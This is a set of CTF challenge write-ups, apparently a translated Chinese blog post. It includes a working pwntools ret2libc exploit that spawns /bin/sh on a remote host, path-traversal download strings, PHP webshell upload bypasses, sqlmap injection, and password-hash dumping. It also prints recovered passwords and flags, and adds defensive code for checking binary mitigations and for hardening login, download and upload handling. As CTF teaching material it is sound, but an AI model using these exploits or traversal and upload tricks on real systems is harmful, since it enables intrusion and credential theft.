Writeups for a few CTF challenges

From the column 網安實驗室

Original: Z.thero, 合天智匯

0x01 PlainR2B

This is a fairly simple PWN challenge. First drop the binary into IDA and take a quick look at the program, as shown in the figure.

The input is read with no stack protection, so the read of 0x34 bytes can overwrite the return address of game. First, return into write(1, write@got, 4) with game as write's return address: this leaks the runtime address of write, from which the address of system follows. Because the program loops back into game, the second round writes "/bin/sh" into the name buffer at 0x804A06C and returns into system with that address as its argument.
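The first thing the writeup establishes is which mitigations the binary lacks. The following block is an added example, not code from the original writeup: a minimal checksec-style reader written with only the Python standard library. It reads NX, PIE and RELRO from the ELF program headers (32- and 64-bit) and uses the usual string heuristic for the stack canary (a protected binary imports __stack_chk_fail, so the name appears in .dynstr). The two images it inspects are constructed inside the block (headers only, no code) and are not the challenge binary; WEAK has no canary and an executable stack, HARDENED has everything on. A real file can be passed as argv[1].

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
ET_EXEC, ET_DYN = 2, 3


def _parse_headers(data):
    """Return (e_type, program headers) for a little-endian ELF32 or ELF64 image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] == 2:                                   # EI_CLASS: 2 = 64-bit
        hdr = struct.unpack_from("<HHIQQQIHHH", data, 16)
        fmt, names = "<IIQQQQQQ", ("p_type", "p_flags", "p_offset", "p_vaddr",
                                    "p_paddr", "p_filesz", "p_memsz", "p_align")
    else:                                              # 1 = 32-bit
        hdr = struct.unpack_from("<HHIIIIIHHH", data, 16)
        fmt, names = "<IIIIIIII", ("p_type", "p_offset", "p_vaddr", "p_paddr",
                                    "p_filesz", "p_memsz", "p_flags", "p_align")
    e_type, phoff, phentsize, phnum = hdr[0], hdr[4], hdr[8], hdr[9]
    phdrs = [dict(zip(names, struct.unpack_from(fmt, data, phoff + i * phentsize)))
             for i in range(phnum)]
    return e_type, phdrs


def elf_mitigations(data):
    """checksec-style summary: NX, PIE, RELRO from the program headers, canary by heuristic."""
    e_type, phdrs = _parse_headers(data)
    stack = [p for p in phdrs if p["p_type"] == PT_GNU_STACK]
    return {
        # No PT_GNU_STACK at all means the loader falls back to an executable stack
        "nx": bool(stack) and not (stack[0]["p_flags"] & PF_X),
        "pie": e_type == ET_DYN,
        "relro": any(p["p_type"] == PT_GNU_RELRO for p in phdrs),
        # A canary-protected binary imports __stack_chk_fail; searching for the name
        # is the same heuristic the common checksec scripts use
        "canary": b"__stack_chk_fail" in data,
    }


def build_elf(elf_class, e_type, phdrs, tail=b""):
    """Assemble a headers-only ELF image (constructed sample input, contains no code)."""
    if elf_class == 2:
        ehdr = struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0x400000, 64, 0, 0, 64, 56,
                           len(phdrs), 64, 0, 0)
        body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 16) for t, f in phdrs)
    else:
        ehdr = struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0x8048000, 52, 0, 0, 52, 32,
                           len(phdrs), 40, 0, 0)
        body = b"".join(struct.pack("<IIIIIIII", t, 0, 0, 0, 0, 0, f, 16) for t, f in phdrs)
    ident = b"\x7fELF" + bytes([elf_class, 1, 1, 0]) + b"\x00" * 8
    return ident + ehdr + body + tail


# Constructed samples: WEAK is a 32-bit, fixed-address binary with an RWX stack and no
# canary; HARDENED is a 64-bit PIE with NX, RELRO and a canary import.
WEAK = build_elf(1, ET_EXEC, [(PT_GNU_STACK, 0x7)])
HARDENED = build_elf(2, ET_DYN, [(PT_GNU_STACK, 0x6), (PT_GNU_RELRO, 0x4)],
                     tail=b"\x00__stack_chk_fail\x00")


def report(data):
    """Render the summary the way checksec does: one mitigation per line."""
    return "\n".join("%-7s %s" % (k, "enabled" if v else "DISABLED")
                     for k, v in elf_mitigations(data).items())


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else WEAK
    print(report(data))
```

The canary line is a heuristic only: a statically linked binary keeps the symbol name elsewhere, and a binary that merely mentions the string would pass; for a definitive answer read the dynamic symbol table.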

The Python exploit:

```python
from pwn import *

def rungameAgainPoc(p, yourname, flag):
    # One round of the game: answer the name prompt, then the "get flag" prompt
    p.recvuntil(b"name?\n")
    p.send(yourname + b"\n")
    p.recvuntil(b"flag?\n")
    p.send(flag)

pwnelf = ELF("./pwn")
libcelf = ELF("./libc-2.23.so")
gameadd = 0x080485CB                # address of game(): returning here restarts the loop
plt_write = pwnelf.symbols["write"]
got_write = pwnelf.got["write"]

# p = process("./pwn", env={"LD_PRELOAD": "./libc-2.23.so"})
p = remote("117.50.60.184", 12345)

# Round 1: overwrite game's return address with write@plt, return into game afterwards;
# arguments are write(1, write@got, 4), which leaks the runtime address of write
rungameAgainPoc(p, b"ichuqiu",
                b"0" * 32 + p32(plt_write) + p32(gameadd) + p32(1) + p32(got_write) + p32(4))
write_addr = u32(p.recv(4))
print("pwn write", hex(write_addr))
libcelf_system_add = libcelf.symbols["system"] + write_addr - libcelf.symbols["write"]
print("pwn libcelf_system_add", hex(libcelf_system_add))

# Round 2: the name is stored at 0x804A06C, so "/bin/sh " becomes system's argument
rungameAgainPoc(p, b"/bin/sh ",
                b"0" * 32 + p32(libcelf_system_add) + p32(gameadd) + p32(0x804A06C))
p.interactive()
```

flag{62c51c85-1516-4ad8-989c-58ce8c29642e}

0x02 Antidbg

Searching for the key function in IDA reveals a loop that performs a comparison. At first glance the value compared looks like an 8-digit number, so the comparison was split up.

The values captured from the stack and the decoding script:

```python
# Stack values captured in the debugger (IDA stack view)
# [ebp+var_6C] 01050D02070106010206000B07010C06
# [ebp+var_5C] 0100070D020108080D000103040D0303
# [ebp+var_4C] 02080602
# [ebp+var_48] 02050009
# [ebp+var_44] 00000D02

def cover(buf):
    """Decode a hex string and reverse it: IDA shows the value, memory holds the bytes reversed."""
    return bytes.fromhex(buf)[::-1]

def cover_hex_lines(buf):
    """Turn an IDA hex-view dump (whitespace-separated byte pairs) into bytes."""
    return bytes.fromhex("".join(buf.split()))

var_6c = (cover("01050D02070106010206000B07010C06") + cover("0100070D020108080D000103040D0303")
          + cover("02080602") + cover("02050009") + cover("00000D02"))
# print(len(var_6c))

byte_402178 = cover_hex_lines("""
02 02 02 02 03 01 01 02
01 01 02 01 01 00 01 01 02 02 00 01 01 01 01 00
01 01 02 02 00 01 01 02 02 01 01 01 01 01 02 01
01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00
03 03 0D 04 03 01 00 0D 08 08 01 02 0D 07 00 01
06 0C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 01
00 00 00 00 EF 28 68 5B 00 00 00 00 02 00 00 00
48 00 00 00 E4 22 00 00 E4 16 00 00 00 00 00 00
EF 28 68 5B 00 00 00 00 0C 00 00 00 14 00 00 00
2C 23 00 00 2C 17 00 00 00 00 00 00 EF 28 68 5B
00 00 00 00 0D 00 00 00 54 02 00 00 40 23 00 00
40 17 00 00 00 00 00 00 EF 28 68 5B 00 00 00 00
0E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 00
E0 22 40 00 01 00 00 00 E8 20 40 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
""")

byte_402138 = cover_hex_lines("""
00 00 00 00 01 00 00 00
02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00
06 00 00 00 07 00 00 00 08 00 00 00 09 00 00 00
0A 00 00 00 0B 00 00 00 0C 00 00 00 0D 00 00 00
0E 00 00 00 0F 00 00 00
""")

dword_403018 = cover_hex_lines("""
02 00 00 00 02 00 00 00
02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00
""")

# .text:0040110E mov ecx, [ebp+var_4]
# .text:00401111 xor ecx, ebp
# .text:00401113 mov dword_40301C, 3
# .text:0040111D mov dword_403020, 6
# .text:00401127 mov dword_403024, 7
# The values in memory are changed at runtime, so patch the dump to match
dword_403018 = (dword_403018[0:4] + b"\x03" + dword_403018[5:8] + b"\x06"
                + dword_403018[9:12] + b"\x07" + dword_403018[13:])
print(dword_403018.hex())

# Each flag character: high nibble from the patched dword table, low nibble from byte_402138
flag = ""
for i in range(0, 42):
    hightnum = dword_403018[byte_402178[i] * 4] << 4
    numbershow = hightnum + byte_402138[var_6c[i] * 4]
    flag += chr(numbershow)
print(flag)
```

flag{06b16a72-51cc-4310-88ab-70ab68290e22}

0x03 sqli

This challenge is a SQL constraint attack: register a user named "admin " (with a trailing space) and any password that meets the rules, then log in and the flag is shown.

flag{b5a1f9c5-ac30-4e88-b460-e90bcb65bd70}

0x04 word

This counts as a sign-in challenge. The Word document asks you to follow the competition platform's official WeChat account and reply "部分flag" (partial flag), which returns flag{71d7ce04-197a-4d. Rename the .doc to .zip and extract it; document.xml contains the second part, b3-9c1d-0c419406a594}.

flag{71d7ce04-197a-4db3-9c1d-0c419406a594}

0x05 RSA

```
openssl rsa -inform PEM -in pubkey1.pem -pubin -text
Public-Key: (2048 bit)
Modulus:
    00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
    3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
    8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
    bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
    a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
    c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
    dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
    ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
    4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
    70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
    03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
    79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
    ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
    2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
    e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
    e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
    8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
    42:17
Exponent: 2333 (0x91d)
```

```
openssl rsa -inform PEM -in pubkey2.pem -pubin -text
Public-Key: (2048 bit)
Modulus:
    00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
    3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
    8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
    bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
    a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
    c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
    dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
    ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
    4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
    70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
    03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
    79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
    ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
    2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
    e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
    e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
    8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
    42:17
Exponent: 23333 (0x5b25)
```

As can be seen, the two public keys have the same n and differ only in e, so the RSA common modulus attack applies. The Python is as follows (libnum's s2n/n2s and gmpy2 are replaced by int.from_bytes/to_bytes and the script's own egcd, so it runs on a plain Python 3.8+):

```python
import base64

def bignumber(n):
    """Turn the hex modulus printed by openssl into an integer."""
    return int.from_bytes(bytes.fromhex(n), "big")

n = """00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
    3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
    8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
    bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
    a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
    c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
    dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
    ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
    4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
    70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
    03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
    79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
    ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
    2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
    e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
    e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
    8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
    42:17""".replace(":", "").replace(" ", "").replace("\r", "").replace("\n", "")
# print(n)
n = bignumber(n)
print(hex(n))
e1 = 2333
e2 = 23333

def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g."""
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)

flag1 = base64.b64decode(open("flag1.enc", "rb").read())
flag2 = base64.b64decode(open("flag2.enc", "rb").read())
c1 = int.from_bytes(flag1, "big")
c2 = int.from_bytes(flag2, "big")

g, s1, s2 = egcd(e1, e2)     # s1*e1 + s2*e2 == 1
print(s1, s2)
# A negative coefficient means that ciphertext has to be inverted mod n first
if s1 < 0:
    c1, s1 = pow(c1, -1, n), -s1
if s2 < 0:
    c2, s2 = pow(c2, -1, n), -s2
m = pow(c1, s1, n) * pow(c2, s2, n) % n
print(m.to_bytes((m.bit_length() + 7) // 8, "big"))
```

flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}

0x06 拋磚引玉

1. Based on the CMS version, the vulnerability details were found on a wooyun mirror. The site has SQL injection, but the database's user table is empty. There is also an arbitrary file download: down.php?urls=data/../config.php downloads the file, which reveals the password of the DB user mvoa: define('DB_PWD', 'B!hpp3Dn1.'); flag: B!hpp3Dn1.
2. url/www.zip returns the site backup; its config.php contains the DB root password: define('DB_PWD', 'mypasswd'); flag: mypasswd

0x07 暗度陳倉

1. The download path /u-are-admin/download.php?dl= reports that the file cannot be found (folder u-Are-Admin/u-upload-file), which exposes the key directory /u-Are-Admin/. flag: /u-Are-Admin/
2. Files can be uploaded in /u-Are-Admin/. Upload a one-line PHP webshell with the extension Php (case bypass), connect with Caidao (中國菜刀) and run net user to read the full name of the administrator account Hack. flag: Hacked356
3. From the shell, admin.txt in the root of the super administrator's Desktop can be read directly. flag: ad16a159581c7085c771f

0x08 瞞天過海

1. AWVS found an injection point at /cat.php?id=2; sqlmap runs against it directly, and the injection yields the backend administrator's plaintext password, serverlog. flag: serverlog
2. The injection also yields root's password hash, *21C5210729A90C69019F01FED76FAD4654F27167, which cmd5 decrypts to rootserver. flag: rootserver
3. After logging in, the Download log feature can download arbitrary files; the contents of password.txt in the root of C: are obtained with /classes/downloadfile.php?file=../../../../../../password.txt flag: c9c35cf409344312146fa7546a94d1a6

0x09 偷梁換柱

1. AWVS found a .git source leak; download the whole source with GitHack. The database file contains the username and password (admin / Admin@pgsql). flag: Admin@pgsql
2. Log in with that username and password. The image manager accepts an image carrying a one-line webshell; the displayed image URL with "small" removed is the real file path, /admin/uploads/111.php.png. Connect to it with Caidao directly (the png is parsed as php), then net user in the virtual terminal gives the full name of the administrator account ichunqiu.
3. Caidao can read the first 16 characters of /tmp/access.log directly.

0x10 反客為主

1. The scanner found a file inclusion and a txt file holding a large webshell; get a shell by constructing the path url/info/include.php?filename=..//sjk-uploads/UareHack.txt (the shell password is a). With the shell, Documents.txt under the phpStudy directory can be read.
2. With the shell, password.txt in the root of user ichunqiu's Desktop can be read.
3. After getting the shell, an msf payload could not connect back; in the end QuarksPwDump was used to dump ichunqiu's password hash, which was cracked online: 78beaa5511afa889b75e0c8d76954a50:4ffe895918a454ce0f872dad8af0b4da::: flag: 123qwe123
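The web challenges from 0x03 and 0x06 to 0x10 all fall to the same three server-side gaps: a username check that the database silently alters (0x03), a download handler that joins user input onto a path without keeping it inside the intended directory (0x06, 0x08), and an upload filter that looks only at a case-sensitive last extension (0x07, 0x09). The block below is an added example, not code from the original writeups or the challenge applications, showing each gap beside its fix. The 0x03 part emulates two MySQL behaviours in plain Python (VARCHAR truncation and trailing-space-insensitive comparison under a PAD SPACE collation); the column width, web root and download directory are assumptions, since the writeups do not show the applications' code, and the emulation uses the general truncation form of the attack rather than the single trailing space the challenge accepted.

```python
import posixpath

# Assumptions (the writeups do not show the applications' code): username column is
# VARCHAR(20); downloads may only come from <webroot>/data; uploads are images.
USERNAME_WIDTH = 20
WEBROOT = "/var/www/html"
DOWNLOAD_DIR = WEBROOT + "/data"
IMAGE_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}


# --- 0x03: the constraint attack, emulated (no real database involved) ----------------
def _truncate(value):
    return value[:USERNAME_WIDTH]          # INSERT silently cuts to the column width


def _padspace_equal(a, b):
    return a.rstrip(" ") == b.rstrip(" ")  # '=' under PAD SPACE ignores trailing spaces


class VulnerableUsers:
    def __init__(self):
        self.rows = []                     # (stored_username, password)

    def register(self, username, password):
        # The duplicate check runs on the untruncated name, so "admin<spaces>x" looks new...
        if any(_padspace_equal(stored, username) for stored, _ in self.rows):
            return False
        self.rows.append((_truncate(username), password))   # ...but is stored as "admin<spaces>"
        return True

    def login(self, username, password):
        for stored, pw in self.rows:
            if _padspace_equal(stored, username) and pw == password:
                return stored.rstrip(" ")  # the attacker's row now answers for "admin"
        return None


class HardenedUsers(VulnerableUsers):
    def register(self, username, password):
        # Refuse anything the database would silently alter, then compare exactly
        if not username or username != username.strip() or len(username) > USERNAME_WIDTH:
            return False
        if any(stored == username for stored, _ in self.rows):
            return False
        self.rows.append((username, password))
        return True

    def login(self, username, password):
        for stored, pw in self.rows:
            if stored == username and pw == password:   # exact, space-sensitive match
                return stored
        return None


# --- 0x06 / 0x08: arbitrary file download ------------------------------------------
def safe_download_path(requested):
    """Resolve a user-supplied path and return it only if it stays inside DOWNLOAD_DIR."""
    if "\x00" in requested or "\\" in requested or requested.startswith("/"):
        return None
    resolved = posixpath.normpath(posixpath.join(WEBROOT, requested))
    if not resolved.startswith(DOWNLOAD_DIR + "/"):
        return None
    return resolved


# --- 0x07 / 0x09: upload filename policy -------------------------------------------
def upload_allowed(filename):
    """Allow-list the last extension case-insensitively and refuse script-like inner
    extensions, so neither 'shell.Php' nor '111.php.png' gets through."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not all(parts):
        return False
    if parts[-1] not in IMAGE_EXTENSIONS:
        return False
    return not any(p in SCRIPT_EXTENSIONS for p in parts[1:-1])


if __name__ == "__main__":
    users = VulnerableUsers()
    users.register("admin", "s3cret")
    users.register("admin" + " " * 20 + "x", "attacker")
    print("vulnerable login as:", users.login("admin", "attacker"))
    users = HardenedUsers()
    users.register("admin", "s3cret")
    print("hardened accepts 'admin ':", users.register("admin ", "attacker"))
    for req in ("data/../config.php", "../../../../../../password.txt", "data/report.csv"):
        print(req, "->", safe_download_path(req))
    for name in ("shell.Php", "111.php.png", "photo.PNG"):
        print(name, "->", upload_allowed(name))
```

The path check is purely lexical; on a real filesystem follow it with os.path.realpath on the result and repeat the prefix test, so a symlink inside the download directory cannot point back out. For uploads, the filename policy is only the first layer: store files under a server-generated name and serve the upload directory with script execution disabled, which is what would have stopped 111.php.png from running even after it was accepted.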

(Please credit the source when reposting.)

